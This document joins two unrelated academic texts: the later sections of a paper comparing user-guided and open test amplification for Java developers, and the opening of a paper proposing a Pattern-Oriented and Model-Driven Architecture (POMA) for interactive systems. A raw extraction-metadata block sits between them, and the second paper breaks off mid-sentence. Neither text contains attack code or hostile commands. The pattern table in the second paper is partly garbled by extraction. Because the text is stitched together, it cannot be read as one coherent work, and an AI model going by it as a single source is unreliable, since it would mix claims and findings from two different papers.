and they mainly identified as working in general software development (4), research (2) or data and analytics (2). 1) Guided Test Amplification: Looking at the feedback regarding the guided test amplification, presented in Fig. 5, the participants strongly agree that the control flow graph showing the coverage of the target method is easy to understand (Q1). When asked whether the information provided is valuable, the participants strongly agree (Q2) and point out that the primary value is in visualizing the code structure and coverage, especially when the complexity of the method under test is high. Question (Q3) centers around whether the control flow graph effectively lets the participants convey their expectation of what to cover to the amplification. On average the participants agree to this, pointing out that it also helps identify all scenarios that are possible when calling the method under test. They agree that the same visualization is also easy to understand when it comes to showing the coverage of an amplified test (Q4), and helps to select which amplified test to keep and add into the test suite (Q5). In this selection process, the visualization was especially helpful when the amplified tests provided diverse coverage contributions in methods with many branching points. Two participants were neutral about using the control flow graph to select a test, pointing to that they only want to cover the previously selected branch and rather focus on the code of the amplified test instead. When selecting or add the test without further inspection. 2) Open Test Amplification: When it comes to the open test amplification, our study participants are more divided, but on average agree that the text-based instruction coverage explanation is easy to understand (Q6, Q7) and provides useful information (Q8). The main complaints were that listing each occurrence of new instruction coverage was too detailed and that the connection between the text and the covered instructions was not clear even with the provided hyperlinks. The participants that were positive found the class and method names informative and liked that the hyperlinks let them locate the code under test conveniently. We asked whether the provided information about the amplification mutations in the test (Q9) and the additional coverage (Q10) helped the developers select which test to keep. The participants on average agreed that the additional coverage is helpful to select which test to keep (Q10). However, they criticized that they could not see the existing coverage to judge if a line in the code under test is already covered or not. One participant also thought out loud about whether the provided coverage is actually important coverage. 3) Both Approaches Compared: After discussing each amplification approach separately with our participants, we asked several questions to compare both approaches (see Fig. 6). Directly asked whether the instruction coverage of open test amplification or the branch coverage of guided test amplification is easier to understand, all participants prefer the branch coverage (Q13). The participants found it easier to map the branch coverage to the source code structure. Some were also not familiar with the concept of instruction coverage and struggled to identify the single instructions in a line of code. Most participants prefer the visualized control flow graph over representing coverage as highlights in the editor (Q14). Using the visualization they did not need to read the source code of the method under test. We asked the developers to reflect which approach helps them more during test generation (Q16) and they were divided between the two approaches. Seven participants prefer the guided test amplification as it is closer to writing tests in real-life scenarios, where they focus on specific features to cover. Two participants prefer open test amplification: one proposes to use it early in the test creation process to cover as much code as possible, the other focuses on connecting a new test with the existing ones it is based on, which is clearer during open test amplification. Three participants were neutral and voted to combine the two approaches. When they do not have a specific coverage goal they would use open test amplification, while they would choose the guided test amplification when they aim for more control over each tests’ coverage. Regarding selecting which resulting test to incorporate into the test suite, the participants mainly prefer the guided test amplification (Q15). The ten participants voting for guided test amplification mention that when writing tests they usually have a specific feature in the code they want to cover, which they can achieve by guiding the test amplification. One participant prefers open test amplification as they focus on covering the whole project as much as possible and want to compare the different tests based on their total contributed coverage. One participant is neutral and would use both approaches depending on the situation. Finally, we asked about their overall impression of the amplified test, which was positive (Q11, Fig. 5). The participants on average strongly agree that they would use test amplification again (Q12) and gave a variety of suggestions on how to improve the tools for both test amplification approaches. One aspect they noted positively is that the tool clearly indicates when it could not generate a test for a selected branch, which made these situations less negative in the participants’ opinion. F. Answer to RQ2: How do developers perceive guided test amplification (compared to open test amplification)? Looking at all the results of our user study, we see that a majority of our participants prefer the user-guided test amplification approach (Q16) because it fits better into the typical situation they create tests in: when they want to test a specific location in their code. Factors contributing to this judgement are that all participants found branch coverage easier to understand than instruction coverage (Q13), and most preferred the structure-revealing control-flow graph visualization over the more precise textual representation of additional coverage (Q14). This preference for user-guided test amplification is also supported by the overall more positive ratings in the detailed questions about the approach (Q1-5), compared to the detailed questions about open test amplification (Q6-10). From the explanations of our participants we learned that they do not universally prefer user-guided test amplification over open test amplification, but that it depends on their use case, the information that they need to judge the amplified tests and the amount of control they want to have over the amplification process. The results of our technical study showed that the effectiveness of guided test amplification compared to open test amplification depends on the class structure in the code under test and the data types used as parameters. Taken together, we see that there are trade-offs between the two approaches that should be considered when choosing either to work with or to improve in future research. In Section V we collect these trade-offs and discuss the implications of them for practitioners and researchers. G. Threats to Validity There are several threats to the validity of our two studies and their results. When it comes to internal validity, we mitigated the threats by switching the order of the two approaches (threat: learning effect) and which class each approach was applied to (threat: dissimilar classes) equally over the four randomly-assigned participant groups. The characteristics of the two projects and their classes in our technical study could dictate the outcome of our technical study. To mitigate this, we manually analyzed the classes and transparently discuss the impact of the number of methods per class and the complexity of the used data types on the effectiveness comparison of the test amplification approaches. To ensure the confirmability of our user study results, we focus on presenting the closed question ratings and support them with explanations staying as close as possible to the participants’ formulations. Regarding construct validity, the results of both studies are influenced by our prototype implementations. We used the same test amplification tool for both approaches, which is based on DSpot and limited to Java, with the only differences in implementation described in Section III. Another threat is whether we are measuring the effect of the different amplification approaches or the changed user interface (UI) from open to user-guided test amplification. We agree with the original creators of developer-centric test amplification [7] that a tool for developers and its UI can fundamentally not be developed or studied in isolation. To mitigate this threat, we ask separate questions about the information and the UI elements to our participants (Q1/2, Q4/5, Q6/10, Q13/14). The external validity of the results from our technical study is threatened by the two projects selected for the case study. We observed that the complexity of the used data types and the number of methods in a class influence the effectiveness of the test amplification. Further studies on a larger variety of projects and classes are needed to demonstrate the generalizability of our findings. Another threat to the external validity of our user study is whether the participants experienced the whole variety of methods which to test with amplification. To mitigate this, we selected example classes with a varied complexity of methods and initial tests that cover some methods of the class fully, partially or not at all. In the user study we have participants from a range of different software domains, but no participant has more than ten years of development experience, making the results potentially not generalizable to very senior developers. V. DISCUSSION AND IMPLICATIONS FOR PRACTITIONERS AND RESEARCHERS With designing user-guided test amplification, we set out to improve the effectiveness of the process and the understandability of the produced tests. Our technical case study indicates that user-guided test amplification is indeed more effective, and the user study suggests that developers find its components more understandable than those of open test amplification. However, we also saw that the effectiveness of each approach varies per project and class, and that the developers might prefer different test amplification approaches depending on their current goal with testing. In this section, we will discuss a series of trade-offs that we identified based on our two studies and the design of both amplification techniques. Table IV gives an overview of these trade-offs, together with the source from which we take the answer for either technique. The two amplification approaches fit two complimentary use cases for software developers. From the participants reflecting on which approach is more helpful to generate tests (Q16), we learned that the user-guided version is better suited when they write tests in conjunction with the production code, also called test-guided development [3], [13]. When their focus is to improve the test suite itself, e.g., to address technical test debt [14]–[17], open test amplification would be the better choice. This is because it connects an amplified test clearer to the original test from the test suite by pointing out the applied input modifications. Open test amplification also informs the developer about the coverage impact of an amplified test across the whole project [7]. With the high prevalence of integration tests in JUnit test suites [18], [19], tests amplified from them can improve test coverage in several locations throughout a software project [9]. Because this scattered coverage information can be confusing [7] and partially irrelevant to developers [9], user-guided test amplification focuses only on the impact in the targeted method. In return, it can use the available room to convey the stronger metric of branch coverage in a simple and easy to understand visualization (Q14). A previous study on the interaction of software developers with test amplification showed the importance of managing the users’ expectations and making sure they align with what the tool can provide [7]. Open test amplification only proposes tests for locations it can actually cover, so it can easily fulfill the user’s expectations for receiving tests. In our proposal of user-guided test amplification the developers can select any branch as a target, but as we saw in the technical study, more than half of the branches in our study projects could not be covered. This might disappoint the user and not meet their expectations. When the participants of our study encountered this, they however were positive about the fact that the tool clearly reported that it could not generate a test (participant reflection on Q12). To address the low success rate of guided test amplification, we would need to initialize the objects and parameters correctly to hit the targeted branch (manual inspection technical study). Advanced techniques like concolic execution [20]–[22], or search-based optimization [23] could address this. However, these can be expensive to compute. When studying the effectiveness of test amplification in our technical study, we saw that guided test amplification produces a higher ratio of tests that successfully cover the targeted branch. This highly fits the use case of testing the developer’s current focal method. In contrast, the more explorative search in the whole method space of a class under test that open test amplification performs is more effective when the goal is to improve the coverage across the whole class. Someone who uses guided test amplification for this would need to invoke it over and over again for each method in the class. A. Implications for Practitioners Our evaluation of user-guided and open test amplification uncovered a set of trade-offs a software developer or their manager should consider when choosing which approach to apply. The main, reoccurring consideration is why someone wants to generate tests: (1) to improve the test suite itself (choose open test amplification), or (2) to get support for writing tests while working on a specific part of the production code (choose user-guided test amplification). Beyond this, our study also shows anecdotal evidence that when a code base contains many complex classes with private constructors, test amplification with our state-of-the-art tool will likely not be able to cover many branches. B. Implications for Researchers For researchers in the area of test amplification and generation, as well as developer-centric support tools, the insights from our study point to several new research directions. Improving the effectiveness of guided test amplification asks for more advanced techniques to initialize objects to cover the targeted branch. Can we apply computationally expensive techniques while still providing an interactive user experience? Could we actively ask the developer to help us with the initialization of objects that are hard to create? Here the question is whether they would know enough to provide a valuable initialization and whether the automation would still be worth it to use for the developer if they would have to contribute such substantial effort to the test generation. Many decisions in the design of either test amplification approach are motivated by the required interactive speed. Would it be feasible to pre-generate tests in the background and then selectively present relevant ones to the developer when they request tests? A complication here is that current developer-test generation approaches like test amplification or search-based generation with EvoSuite [24], require the code under test to be available. However, we observed repeatedly in our user study that developers are looking for tests covering the code they just wrote a short while ago. Why did the participants of our study prefer the control-flow graph visualization of the branch coverage over the bytecode instruction visualization of the line coverage? Based on our observations, we conjecture that the following aspect could influence this: (1) using a coverage metric that is embedded in the developer’s mental structure of the code, (2) limiting the scope of the displayed code coverage to just the one method the developer is concerned about, and (3) presenting the existing coverage in conjunction with the additionally provided coverage, letting the developer grasp the differential impact a new amplified test makes. VI. RELATED WORK In this section, we discuss related work from the areas of directed and interactive test generation. A. Directed Test Generation Search-Based Software Testing (SBST) uses search algorithms to automatically find tests that a variety test objectives captured in a fitness function [25]. SBST has been used to automate test generation for various test goals, such as maximizing structural coverage [26]–[30] and crash reproduction [23], [31], [32]. Test suite augmentation techniques are used to generate tests that target code changes that the existing test suite does not cover [33]. Xu et al. proposed several approaches for test augmentation using concolic testing [34], genetic algorithms [35], and a combined, hybrid approach [36], [37]. In their concolic approach, they find the source node of a changed branch and select existing tests that reach this source node. Then they explore different directions of path conditions to find new tests for the changed branch. Their genetic algorithm uses a fitness function that prefers the distance of a test’s execution to the changed branch. In contrast to their approach, our test amplification focuses on all uncovered branches of a software, not just the recently changed ones. Further, our approach is simpler, as we only select a few initial tests and only amplify them with one evolutionary iteration. Several researchers focused on generating targeted tests to support debugging. Ma et al. propose directed symbolic execution, using the distance to the target line as information to guide the symbolic execution [38]. Ding et al. [39] combine symbolic execution, to find a suitable entry point to reach a target statement, with concolic execution and heuristics, to try to satisfy constraints too difficult for the symbolic execution. Our approach makes use of the existing tests as a basis for the amplification, and we do not use symbolic execution to reduce our computational costs. B. Interactive Test Generation Several techniques are discussed to incorporate information provided by humans into the test generation process. Marculescu et al. proposed Interactive Search-Based Software Testing (ISBST) to involve domain specialists in test generation [40]. Their feedback adapts the fitness function during the search process by changing the relative importance of system quality attributes. The primary difference between their work and ours is that they involve domain specialists in the test generation, while we target software developers. They pointed out the importance of perfecting how automated test systems communicate with users and ensuring that results are understandable to the users when transferring ISBST to the industry [41]. We address this in the design of our interface, visualizing information about the test amplification results to help the user’s comprehension. Murphy et al. propose to apply grammatical evolution into SBST and incorporate human expertise into the search [42]. They proposed that users can define the search space they want their tests to be created from by specifying a grammar. Ramírez et al. observed two key issues hindering the acceptance of automated tests by analyzing various studies that evaluated the effectiveness and acceptance of test generation tools [43]: the opacity of the generation process and the lack of cooperation with the tester. To address this, they incorporate the tester’s subjective assessment of readability to compare tests with the same fitness in a search-based test generation process. Our work also addresses the concerns Ramírez et al. raised. We cooperate with testers and make the process transparent by letting testers express their branch coverage goal and guide the test generation. We also improve the understandability of tests by connecting the amplified tests with testers’ coverage goals. VII. CONCLUSION AND FUTURE WORK The aim of user-guided test amplification was to ease the effort for software developers when understanding amplified tests, by letting them point the test generation to a specific target branch and then visualizing the resulting coverage leveraging a control flow graph of the method under test. Through our technical case study, we show that even simple modifications to the amplification process make guided test amplification more effective at generating tests for a targeted branch. Our user study shows that developers prefer the interaction with user-guided test amplification, but that the choice for either technique is dependent on the current use case of the developer. From our studies and the design of both approaches, we identify and discuss four trade-offs that influence the choice between open and user-guided test amplification: (1) the current task and goal of the developer, (2) where the amplified test should provide coverage, (3) the ability to fulfill the user’s expectation to receive a generated test, and (4) the available time for the test amplification. Beyond the research implications we mentioned earlier, our work can be the basis for several future research directions: We observed the developer’s wishes to generate tests while they are working on a particular piece of code. While user-guided test amplification is a step in this direction, the next step would be to detect when a developer has finished a change, and automatically generate and propose a test for the code change to the developer. The feedback on the coverage visualization showed that it helps developer to understand test coverage better. On the other hand, the expectations of the user guiding the amplification now requires more advanced test generation approaches that are already available in other tools. The next step, would be to disconnect the test generation tool from the interaction layer that proposes the tests to developers. This allows for more flexibility in choosing the test generation tool that is right for the job while still benefitting from the continued advancement in test communication. REFERENCES
{"Source-Url": "https://azaidman.github.io/publications/brandtSCAM2023.pdf", "len_cl100k_base": 8478, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 33385, "total-output-tokens": 11886, "length": "2e13", "weborganizer": {"__label__adult": 0.0003876686096191406, "__label__art_design": 0.00029850006103515625, "__label__crime_law": 0.0002562999725341797, "__label__education_jobs": 0.001068115234375, "__label__entertainment": 4.5299530029296875e-05, "__label__fashion_beauty": 0.00016045570373535156, "__label__finance_business": 0.00016558170318603516, "__label__food_dining": 0.0002505779266357422, "__label__games": 0.0004432201385498047, "__label__hardware": 0.0004029273986816406, "__label__health": 0.0003325939178466797, "__label__history": 0.0001518726348876953, "__label__home_hobbies": 6.258487701416016e-05, "__label__industrial": 0.0001962184906005859, "__label__literature": 0.0002319812774658203, "__label__politics": 0.0002142190933227539, "__label__religion": 0.0003817081451416016, "__label__science_tech": 0.0018978118896484375, "__label__social_life": 9.91225242614746e-05, "__label__software": 0.004100799560546875, "__label__software_dev": 0.98828125, "__label__sports_fitness": 0.0002608299255371094, "__label__transportation": 0.00033092498779296875, "__label__travel": 0.00018036365509033203}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51893, 0.02534]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51893, 0.32671]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51893, 0.90933]], "google_gemma-3-12b-it_contains_pii": [[0, 5333, false], [5333, 8103, null], [8103, 10244, null], [10244, 16050, null], [16050, 21145, null], [21145, 27124, null], [27124, 31137, null], [31137, 37588, null], [37588, 42293, null], [42293, 50022, null], [50022, 51893, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5333, true], [5333, 8103, null], [8103, 10244, null], [10244, 16050, null], [16050, 21145, null], [21145, 27124, null], [27124, 31137, null], [31137, 37588, null], [37588, 42293, null], [42293, 50022, null], [50022, 51893, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51893, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51893, null]], "pdf_page_numbers": [[0, 5333, 1], [5333, 8103, 2], [8103, 10244, 3], [10244, 16050, 4], [16050, 21145, 5], [21145, 27124, 6], [27124, 31137, 7], [31137, 37588, 8], [37588, 42293, 9], [42293, 50022, 10], [50022, 51893, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51893, 0.05096]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
a729b76a5e57608a46009fa735b46f046b5297b7
Abstract Day-to-day experience suggests that it is not enough to approach a complex design armed with design tips, guidelines, and hints. Developers must also be able to use proven solutions emerging from the best design practices to solve new design challenges. Without these, the designer will not be able to properly apply guidelines or take full advantage of the power of technology, resulting in poor performance, poor scalability, and poor usability. Furthermore, the designer may “reinvent the wheel” when attempting to implement a design solution. A number of design problems continue to arise, such as: (1) decoupling the various aspects of interactive systems (for example, business logic, the UI, navigation, and information architecture; and (2) isolating platform specifics from the concerns common to all interactive systems. In the context of a proposal for a Pattern-Oriented and Model-Driven Architecture (POMA) for interactive systems, this paper identifies an extensive list of patterns categories, and types of models aimed at providing a pool of proven solutions to these problems. The models of patterns span several levels of abstraction, such as domain, task, dialog, presentation, and layout. The proposed POMA architecture illustrates how several individual models can be combined at different levels of abstraction into heterogeneous structures, which can then be used as building blocks in the development of interactive systems. First, we describe the architectural levels and the categories of patterns, as well as the various relationships between patterns; second, we propose five categories of models to address the problems described above which are associated with creating an interactive system. Third, we present the proposed POMA architecture. Fourth, we present a case study to illustrate and clarify the core ideas of our approach and its practical relevance. Keywords: Patterns, Models, Architecture, Interactive Systems, Composition, Mapping, Transformation, POD, MDA, POMA 1. Introduction During the past two decades, research on interactive system and user interface (UI) engineering has resulted in a set of design principles and development frameworks which constitute a major contribution, not only to facilitate the development and maintenance of interactive systems, but also to promote the standardization, portability, and ergonomic “usability” (ease of use) of the interactive systems being developed. Some of these principles are: A precise definition of the UI aimed at: (i) presenting the output to the user; (ii) gathering user entries to transmit them to the interactive system procedures that will treat them; (iii) handling the dialog sequence; - The separation of concerns, especially decoupling the UI from the system semantics; - The definition of reusable and standardized UI components; - Decentralization of dialog management, help, and errors across the various components of an interactive system; - Programming driven by events. Indeed, an interactive system is a program with which the user engages in conversation (dialog) in order to accomplish tasks. An interactive system consists of two parts: the software, which is referred to as the interactive application, and the hardware, which supports the execution of the software part. The software (interactive application) can, in turn, be divided into two sub-parts: the UI, and the algorithms that constitute the semantics of the interactive system. The hardware in an interactive system consists of input and output devices and various managers (device drivers) which provide physical support to the execution of the interactive application. At the same time, a UI can be seen as a means by which the user and the machine can exchange data. For example, the screen on which data are displayed is a medium for user-machine interaction and for feedback in response to the user’s actions. Therefore, a UI is part of an interactive application which: - Presents the output to the user, - Collects the user’s inputs and transmits them to the interactive system that treats them, and - Handles the dialog sequence. Based on these principles, several interactive system architectural models have been introduced. Buschmann et al. define architectural models as [41]: “the structure of the subsystems and components of a system and the relationships between them typically represented in different views to show the relevant functional and non functional properties.” This definition introduces the main architectural components (for instance, subsystems, components, and connectors) and covers the ways in which to represent them, including both functional and nonfunctional requirements, by means of a set of views. A number of architectures specific to interactive systems have been proposed, e.g. Seeheim model [55; 48], Model-View-Controller (MVC) [43], Agent Multi-Faceted (AMF) [54], which is an extension of MVC, Arch/Slinky [47], Presentation Abstraction Control (PAC) [44; 45], PAC-Amadeus, and Model-View-Presenter (MVP) [27]. Most of these architectures consist of three main elements: (1) abstraction or model; (2) control or dialog; and (3) presentation. Their goal is to improve and facilitate the design of interactive systems. However, even though the principle of separating an interactive system into components has its design merits, it can also be a source of serious adaptability and usability problems in systems which provide fast, frequent, and intensive semantic feedback: the communication between the view and the model makes the interactive system highly coupled and complex. Among the problems presented by the architectures quoted above are: • No guideline is provided to encourage the designer to consider other aspects of the dialog that are important to the user, such as assistance or error-handling; • Lack of facilitation of the use of constraints for the design and description of the interface, when these constraints are a great importance to the designer [49; 50; 51; 52; 53; 46]; • The architectural models are poorly located in relation to the life cycle of the UI, which can lead, in particular, to difficulties concerning the passage of the problem analysis (analysis of user needs), expressed generally in terms of tasks and interaction sequences, and to the concepts put forward by these architectures (agents, presentation components, dialog components). Architectural patterns have been proposed to alleviate some of these problems, and indeed were introduced based on the following observation by Alexander: “Each pattern describes a problem that occurs constantly in our environment, and thus describes the heart of the solution to this problem, in such a way that we can use this solution millions of times, but never do it twice the same way” [40]. Such a pattern provides, on one level, a pool of proven solutions to many of the recurring problems listed above. The Pattern-Oriented Software Architecture is an example of a new approach which shows how to combine individual patterns into heterogeneous structures and, as such, can be used to facilitate a constructive instantiation of a system architecture. Patterns provide various benefits, such as: • Well-established solutions to architectural problems, • Help in documenting architectural design decisions, and • Facilitation of communication between users through a common vocabulary. However, we note that the emergence of patterns in the architectural development of interactive systems has not solved some problems associated with this development. Among the challenging problems we address in this paper are the following: (a) Decoupling of the various aspects of interactive systems, such as business logic, UI, navigation, and information architecture; (b) Isolation of the platform-specific problems from the concerns common to all interactive systems. In 2001, the Object Management Group introduced the Model-Driven Architecture (MDA) initiative as an architecture to system specification and interoperability based on the use of formal models (i.e. defined and formalized models). The main idea behind MDA is to specify business logic in the form of abstract models. These models are then mapped (partly automatically) according to a set of transformation rules to different platforms. The models are usually described by UML in a formalized manner which can be used as input for tools to perform the transformation process. Indeed, a model is a formal description of some key aspects of a system, from a specific viewpoint. As such, a model always presents an abstraction of the "real" thing, by ignoring or deliberately suppressing those aspects that would not of interest to a user of that model. Different modeling constructs focus attention by ignoring certain things [35]. For example, an architectural model of a complex system might focus on its concurrency aspects, while a financial model of a business might focus on projected revenues. Model syntax includes graphical or tabular notations and text. D’Souza [35] has identified key opportunities and modeling challenges, and illustrated how the “model” and the “architecture” of MDA could be used to enable large-scale model-driven integration. The advantages of the models are as follows: - They make it easier to validate the correctness of a model. - They make it easier to produce implementations on multiple platforms. - Integration/interoperability across platforms is better defined. - Generic mappings/patterns can be shared by many designs. - They constitute an interactive system of tool-supported solutions. However, we note that the model-driven approach has some weaknesses as well: - MDA does not provide a standard for the specification of mappings: different implementations of mappings can generate very different code and models, which can create dependencies between the system and the mapping solution used. - Designers must take into account a diversity of platforms which exhibit drastically different capabilities. For example, Personal Digital Assistants (PDAs) use a pen-based input mechanism and have average screen size in the range of 3 inches. - The architectural models must be located and compared to the life cycle of the UI: in particular, difficulties may arise related to the problem analysis (analyzing user needs), expressed generally in terms of tasks and interaction sequences, and to the concepts proposed by these architectures (agents, presentation components, and dialog components). Our research goal can be stated as follows: “a new architecture to facilitate the development and migration of interactive systems while improving their usability and quality.” To pursue this goal, it is necessary to define a systematic architecture, supported by a CASE tool, to glue patterns together. In this paper, we identify some of the fundamentals of such an architecture and we present an architecture called the Pattern-Oriented and Model-Driven Architecture (POMA) (Figure 14). We also present an evaluation of the feasibility of some phases of this architecture, such as composition and mapping patterns, and transformation models to create platform-independent models (PIM) and platform-specific models (PSM). Figure 1 summarizes the architectural patterns and models that were combined to obtain the POMA architecture. In this paper, we propose an architectural model which combines two key approaches: model-driven and pattern-oriented. First, we describe architectural levels and categories of patterns, as well as the various relationships between patterns. These relationships are used next to combine and map several categories of patterns to create a pattern-oriented design for an interactive system, as well as to show how to generate specific implementations suitable for different platforms from the same pattern-oriented design. Second, we propose five categories of models (Domain model, Task model, Dialog model, Presentation model, and Layout model) which address problems such as: (a) decoupling the various aspects of interactive systems, such as business logic, UI, navigation, and information architecture; and (b) isolating the platform-specific problems from the concerns common to all interactive systems. Third, the proposed Pattern-Oriented and Model-Driven Architecture (POMA) illustrates how the individual models mentioned above can be combined at different levels of abstraction into heterogeneous structures to be used as building blocks in the development of interactive systems. Fourth, we present a case study to illustrate our approach and its practical relevance. Finally, we provide a conclusion on the research carried out and comment on its evolution in the future. 2. Patterns and Pattern-Oriented Architecture 2.1. About Patterns The idea of using patterns in system design and engineering is not new. It has its roots in the popular work, Gang of Four [2]. Collections of patterns include patterns for UI (UI) design [3; 4; 5], patterns for navigation in a large information architecture, and patterns for visualizing and presenting information. More recently, the concept of the usability pattern has been introduced and discussed as a tool for ensuring the usability of developed systems [16; 17; 18]. A usability pattern is a proven solution for a User Centered Design (UCD) problem that recurs in different contexts. The primary goal of usability patterns in general is to create an inventory of solutions to help UI designers to tackle UI development problems which are common and difficult to solve [19]. 2.2. Architectural Levels and Categories of Patterns A number of pattern languages have been suggested, such as in Van Duyne’s “The Design of Sites” [10], Welie’s “Interaction Design Patterns” [5], and Tidwell’s “UI Patterns and Techniques” [3]. In addition, specific languages have been proposed, such as in Laakso’s “UI Design Patterns” [31] and the UPADE Language [29]. Moreover, various specialized collections of patterns have been published, including patterns for Web page layout design [3; 4; 5], patterns for navigation around information architectures, and patterns for visualizing and presenting information. In our work here, we illustrate how these existing collections of patterns can be used as building blocks in the context of the proposed six-layer architecture. An informal survey conducted in 2004 by the HSCE Research Group at Concordia University identified at least six architectural levels and six categories of patterns which can be used to create a pattern-oriented interactive system architecture. Table 1 illustrates these six levels of architecture for an interactive system, including the corresponding categories of patterns, and gives examples of patterns in each category. <table> <thead> <tr> <th>Architectural Level and Category of Patterns</th> <th>Examples of patterns</th> </tr> </thead> </table> | **Information** This category of patterns describes different conceptual models and architectures for organizing the underlying content across multiple pages, servers, and computers. Such patterns provide solutions to questions such as which information can or should be presented on which device. This category of patterns is described in [39]. | - Reference Model pattern - Data Column pattern - Cascaded Table pattern - Relational Graph pattern - Proxy Tuple pattern - Expression pattern - Schadler pattern - Operator pattern - Renderer pattern - Production Rule pattern - Camera pattern | | **Interoperability** This category of patterns describes decoupling the layers of an Interactive system; in particular, between the content, the dialog, and the views or presentation layers. These patterns are generally extensions of the Gamma design patterns, such as MVC (Model, View, and Controller) observer and command action patterns. Communication and interoperability patterns are useful for facilitating the mapping of a design between platforms. | - Adapter pattern - Bridge pattern - Builder pattern - Decorator pattern - Façade pattern - Factory pattern - Method pattern - Mediator pattern - Memento pattern - Prototype pattern - Proxy pattern - Singleton pattern - State pattern - Strategy pattern - Visitor pattern | | **Visualization** This category of patterns describes different visual representations and metaphors for grouping and displaying information in cognitively accessible chunks. They mainly define the format and content of the visualization, i.e. the graphical scene, and, as such, relate primarily to data and mapping transforms. | - Favorite Collection pattern - Bookmark pattern - Frequently Visited Page pattern - Navigation Space Map pattern | | **Navigation** This category of patterns describes proven techniques for navigating within and/or between a set of pages and chunks of information. This list is far from exhaustive, but helps to communicate the flavor and abstraction level of design patterns for navigation. | - Shortcut pattern - Breadcrumb pattern - Contextual (temporary) horizontal menu at top pattern - Contextual (temporary) vertical menu at right pattern - Information portal pattern - Permanent horizontal menu at top pattern - Permanent vertical menu at left pattern - Progressive filtering pattern - Shallow menus pattern - Simple universal pattern - Split navigation pattern - Sub-sites pattern - User-driven pattern - Alphabetical index pattern - Key-word search pattern - Intelligent agents pattern - Container navigation pattern - Deeply embedded menus pattern - Hybrid approach pattern - Refreshed shallow vertical menus pattern | | **Interaction** This category of patterns describes the interaction mechanisms that can be used to achieve tasks and the visual effects they have on the scene; as such, they relate primarily to graphical and rendering transforms. | - Search pattern - Executive Summary pattern - Action Button pattern - Guided Tour pattern - Paging pattern - Pull-down Button pattern - Slideshow pattern - Stepping pattern - Wizard pattern | | **Presentation** This category of patterns describes solutions for how the contents or the related services are visually organized into working surfaces, the effective layout of multiple information spaces, and the relationship between them. These patterns define the physical and logical layout suitable for specific interactive systems. | - Carrousel pattern - Table Fiber pattern - Detail On Demand pattern - Collector pattern - In place Replacement pattern - List Builder pattern - List Entry View pattern - Overview by Detail pattern - Part Selector pattern - Tabs pattern - Table Sorter pattern - Thumbnail pattern - View | Table 1: Architectural levels and categories of patterns Each of these six categories of patterns is discussed below, and examples are provided. **Information patterns** An information pattern, also called an information architectural pattern (Figure 2), expresses a fundamental structural organization or schema of information. It provides a set of predefined subsystems (information spaces or chunks), specifies their responsibilities, and includes rules and guidelines for organizing the relationships between them. An information pattern is everything that happens in a single information space or chunk. With another pattern, the content of a system is organized in a sequence in which all the information spaces or chunks are arranged as peers, and every space or chunk is accessible from all the others. This is very common on simple sites, where there are only a few standard topics, such as: Home, About Us, Contact Us, and Products. Information which naturally flows as a narrative, time line, or in a logical order is ideal for sequential treatment. An index structure is like the flat structure, with an additional list of contents. An index is often organized in such a way as to make its content easier to find. For example, a list of files in a Web directory (the index page), an index of people's names ordered by last name, etc. Dictionaries and phone books are both very large indices. The Hub-and-Spoke pattern is useful for multiple, distinct, linear workflows. A good example would be an email system, where the user returns to his inbox at several points, e.g. after reading a message, after sending a message, or after adding a new contact. A multi-dimensional hierarchy is one in which there are many ways of browsing the same content. In a way, several hierarchies may coexist, overlaid on the same content. The structure of the content can appear to be different, depending on the user’s task (search, browse). A typical example would be a site like Amazon, which lets you browse books by genre or by title, and also lets you search by keyword. Each of these hierarchies corresponds to a property of the content, and each can be useful, depending on the user’s situation. A strict hierarchy is a specialization of the multi-dimensional hierarchy, and describes a system where a lower-level page can only be accessed via its parent. Interoperability patterns Interoperability patterns are useful for decoupling the way these different categories of patterns are organized, the way information is presented to the user, and the user who interacts with the information content. Patterns in this category generally describe the capability of different programs to exchange data via a common set of exchange formats, to read and write under the same file formats, and to use the same protocols. Gamma et al. [2] offer a large catalog of patterns for dealing with such problems. Examples of patterns applicable to interactive systems include: Adapter, Bridge, Builder, Decorator, Factory Method, Mediator, Memento, Prototype, Proxy, Singleton, State, Strategy, and Visitor [2]. The Adapter pattern is very common, not only to remote client/server programming, but also to any situation in which there is one class and it is desirable to reuse that class, but where the system interface does not match the class interface. Figure 3 illustrates how an adapter works. In this figure, the Client wants to invoke the method request() in the Target interface. Since the Adaptee class has no request() method, it is the job of Adapter to convert the request to an available matching method. Here, the Adapter converts the method request() call into the Adaptee method specificRequest() call. The Adapter performs this conversion for each method that needs adapting. This is also known as Wrapping. ![Figure 3: Adapter pattern](image) Visualization patterns Information visualization patterns allow users to browse information spaces and focus quickly on items of interest. Visualization patterns can help in avoiding information overload, a fundamental issue to tackle, especially for large databases, Web sites, and portals, as they can access millions of documents. The designer must consider how best to map the contents into a visual representation which conveys information to the user while facilitating exploration of the content. In addition, the designer must undertake dynamic actions to limit the amount of information the user receives, while at the same time keeping the user informed about the content as a whole. Several information visualization patterns generally combine in such a way that the underlying content can be organized into distinct conceptual spaces or working surfaces which are semantically linked to one another. For example, depending on the purpose of the site, users can access several kinds of "pages", such as articles, URLs, products, etc. They typically collect several of these items for a specific task, 